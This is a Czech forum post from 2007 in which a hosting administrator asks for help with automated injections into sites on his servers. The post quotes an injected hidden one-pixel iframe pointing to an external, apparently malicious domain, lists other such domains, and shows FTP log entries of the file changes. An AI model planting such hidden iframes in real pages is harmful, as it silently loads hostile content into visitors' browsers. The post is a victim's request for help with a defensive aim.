Dotaz: Vsunute radky (IFRAME) do stranek

Dobry den, mam posledni dobou problem, stava se ze dost casto (ob den?) naleznu na strankach ruznych domen hostovanych na serveru vsunute radky nejakym robotem. Zanechava to zaznam v FTP logu, ale nejsem si jist ze soubory jsou skutecne meneny pres FTP. Co vim urcite je, ze to neni rucni prace.. protoze na nekolika serverech a nekolika domenach jsou soubory meneny ve stejny cas, a z ruznych IP adres.

jedna se o takoveto radky:

<iframe src='http://prevedtraf.biz/adv/167/new.php' width=1 height=1></iframe>

nazvy domen v IFRAME se lisi, byvali to postupem casu napr: traffstats.com, mgkcnt.com, easymoneyforyou.cpom, fdghewrtewrtyrew.com, statrafongon.com, uniqcount.net, megacount.net atd.

Vim ze tento problem resi vice serveru.. ale nikdo nevi odkud se toto bere, a jak toto zamezit.

V FTP logu to zanechava takovyto udaj:

24.45.191.33 - content@us [24/Feb/2007:13:15:27 +0100] "GET /home/content/public_html/index.php" 200 51458
24.45.191.33 - content@us [24/Feb/2007:13:16:36 +0100] "PUT /home/content/public_html/index.php" 200 50721
67.83.18.186 - content@us [24/Feb/2007:13:19:33 +0100] "GET /home/content/public_html/index.shtml" 200 51157
67.83.18.186 - content@us [24/Feb/2007:13:20:12 +0100] "PUT /home/content/public_html/index.shtml" 200 50420

Ale nedokazu si predstavit jak nekdo muze hacknout jakekoliv uzivatelske jmeno, spis mi prijde ze toto je jen zamaskovani skutecneho zdroje ataku, a ze toto jen nekdo/neco pridava zaznam do FTP logu.

Resil jste uz nekdo podobny problem?